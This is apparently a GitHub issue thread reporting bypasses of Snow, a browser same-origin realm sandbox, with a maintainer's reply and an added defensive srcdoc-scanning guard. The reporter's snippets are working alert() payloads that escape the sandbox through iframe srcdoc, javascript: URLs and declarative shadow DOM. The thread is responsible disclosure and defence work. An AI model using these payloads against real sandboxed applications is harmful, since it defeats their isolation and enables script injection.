LavaMoat / snow

Use Snow to finally secure your web app's same origin realms!
https://lavamoat.github.io/snow/demo/
MIT License

Bypass Snow via declarative shadow DOM #44

Closed arxenix closed 1 year ago

arxenix commented 1 year ago

You can create a shadow DOM via the <template> tag's shadowroot attribute in Chrome; this is called the declarative shadow DOM: https://web.dev/declarative-shadow-dom/

Declarative Shadow DOM is processed and attached when the document is loaded, so we use it in an iframe srcdoc.

const f = document.createElement('iframe');
// works for both open and closed shadowroot
f.srcdoc = `
<my-element>
<template id="x" shadowroot="closed">
<b>In Template & ShadowDOM</b>
<iframe src="javascript:alert(document.domain)"></iframe>
</template>
</my-element>
`;
document.body.appendChild(f);

arxenix commented 1 year ago

Turns out that you don't need a shadow DOM at all for this. Simply:

const f = document.createElement('iframe');
f.srcdoc = '<iframe src="javascript:alert(document.domain)"></iframe>';
document.body.appendChild(f);

Declarative shadow DOM might be a separate issue though, because you can still use it to prevent Snow from stripping onload attributes (#32):

const f = document.createElement('iframe');
// works for both open and closed shadowroot
f.srcdoc = `
<my-element>
<template id="x" shadowroot="closed">
<b>In Template & ShadowDOM</b>
<iframe onload="this.contentWindow.alert.call(top, top.origin)"></iframe>
</template>
</my-element>
`;
document.body.appendChild(f);

weizman commented 1 year ago

Awesome catch, I honestly have never heard of declarative shadow DOMs before this. For now the solution would be to block declarative shadow DOMs when they are injected this way; visit #46 to learn more about this decision.

Regarding your other catch which doesn't involve declarative shadow DOMs at all (which is unrelated to this issue), #48 should fix this.

weizman commented 1 year ago

If disallowing usage of declarative shadow DOMs the way Snow does (https://github.com/LavaMoat/snow/issues/44#issuecomment-1369686014) prevents your application from running correctly, please say so in this issue thread so we can discuss the problem and understand how to best deal with it.
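The following is an added example written for this page; it is not Snow's code and not code posted by anyone in the thread, and it does not reproduce whatever #46 and #48 actually implement. It shows the shape of a check that covers both primitives reported above: it scans a string about to be assigned to `iframe.srcdoc` for a `<template>` carrying a declarative shadow root attribute (the `shadowroot` attribute used in the report, plus the later standardized `shadowrootmode`) and for nested `<iframe>` tags with a `javascript:` src or an inline `on*` handler, then wraps the `srcdoc` setter so such assignments are refused. The tag scanner, the finding names and the `installSrcdocGuard`/`shouldBlock` helpers are all assumptions made for the example; the scanner is hand-written so the code runs in Node without a DOM.

```javascript
// Added example (not Snow's code): scan srcdoc HTML for the primitives used in
// issue #44 and refuse the assignment. Hand-rolled tag scanner: handles tag and
// attribute case, quoted and bare values and comments, but is not an HTML5 parser.
function parseTags(html) {
  const tags = [];
  const n = html.length;
  let i = 0;
  while (i < n) {
    const lt = html.indexOf('<', i);
    if (lt < 0) break;
    if (html.startsWith('<!--', lt)) {                 // skip comments entirely
      const end = html.indexOf('-->', lt + 4);
      i = end < 0 ? n : end + 3;
      continue;
    }
    let j = lt + 1;
    const closing = html[j] === '/';
    if (closing) j++;
    const nameStart = j;
    while (j < n && !/[\s\/>]/.test(html[j])) j++;
    const name = html.slice(nameStart, j).toLowerCase();
    if (!/^[a-z]/.test(name)) { i = lt + 1; continue; } // stray '<', not a tag
    const attrs = {};
    while (j < n && html[j] !== '>') {
      if (/[\s\/]/.test(html[j])) { j++; continue; }
      const aStart = j;
      while (j < n && !/[\s=\/>]/.test(html[j])) j++;
      const aName = html.slice(aStart, j).toLowerCase();
      let value = '';
      let k = j;
      while (k < n && /\s/.test(html[k])) k++;
      if (html[k] === '=') {                           // attribute has a value
        k++;
        while (k < n && /\s/.test(html[k])) k++;
        if (html[k] === '"' || html[k] === "'") {      // quoted value
          const end = html.indexOf(html[k], k + 1);
          value = html.slice(k + 1, end < 0 ? n : end);
          j = end < 0 ? n : end + 1;
        } else {                                       // bare value
          const vStart = k;
          while (k < n && !/[\s>]/.test(html[k])) k++;
          value = html.slice(vStart, k);
          j = k;
        }
      }
      if (aName) attrs[aName] = value;
    }
    tags.push({ name, closing, attrs });
    i = j + 1;
  }
  return tags;
}

// Browsers ignore whitespace/control characters inside "java\nscript:" URLs.
function isJavascriptUrl(src) {
  return src.replace(/[\s\u0000-\u001f]/g, '').toLowerCase().startsWith('javascript:');
}

// `shadowroot` is the attribute the report uses; `shadowrootmode` is the
// standardized name, so both are treated as a declarative shadow root.
const DSD_ATTRS = ['shadowroot', 'shadowrootmode'];

function scanSrcdoc(html) {
  const findings = [];
  for (const t of parseTags(html)) {
    if (t.closing) continue;
    if (t.name === 'template') {
      const attr = DSD_ATTRS.find((a) => a in t.attrs);
      if (attr) findings.push({ kind: 'declarative-shadow-root', mode: t.attrs[attr] });
    } else if (t.name === 'iframe') {
      findings.push({
        kind: 'nested-iframe',
        javascriptSrc: isJavascriptUrl(t.attrs.src || ''),
        handlers: Object.keys(t.attrs).filter((a) => a.startsWith('on')),
      });
    }
  }
  return findings;
}

// Example policy (an assumption, not Snow's): declarative shadow roots are refused
// outright; nested iframes only when they carry a javascript: src or an on* handler.
function shouldBlock(findings) {
  return findings.some((f) =>
    f.kind === 'declarative-shadow-root' ||
    (f.kind === 'nested-iframe' && (f.javascriptSrc || f.handlers.length > 0)));
}

// Wrap the srcdoc accessor on a prototype. In a page this is
// HTMLIFrameElement.prototype; it is a parameter so it can be exercised in Node.
function installSrcdocGuard(proto, onBlock) {
  const desc = Object.getOwnPropertyDescriptor(proto, 'srcdoc');
  Object.defineProperty(proto, 'srcdoc', {
    configurable: true,
    enumerable: desc.enumerable,
    get() { return desc.get.call(this); },
    set(value) {
      const findings = scanSrcdoc(String(value));
      if (shouldBlock(findings)) { onBlock(findings); return; } // drop the assignment
      desc.set.call(this, value);
    },
  });
}

// In a browser, hook the real prototype; under Node this branch is skipped.
if (typeof HTMLIFrameElement !== 'undefined') {
  installSrcdocGuard(HTMLIFrameElement.prototype, (f) => console.warn('srcdoc blocked', f));
}
```

This only covers the `srcdoc` property setter; `setAttribute('srcdoc', ...)`, `document.write`, `innerHTML` into a nested document and the other routes a hardened project has to hook are out of scope here, and the thread itself does not say how Snow closes them. The scanner deliberately errs on the side of matching (case-insensitive names, bare attribute values, whitespace inside `javascript:`) because a string check that can be beaten by `<TEMPLATE ShadowRootMode=open>` is no check at all.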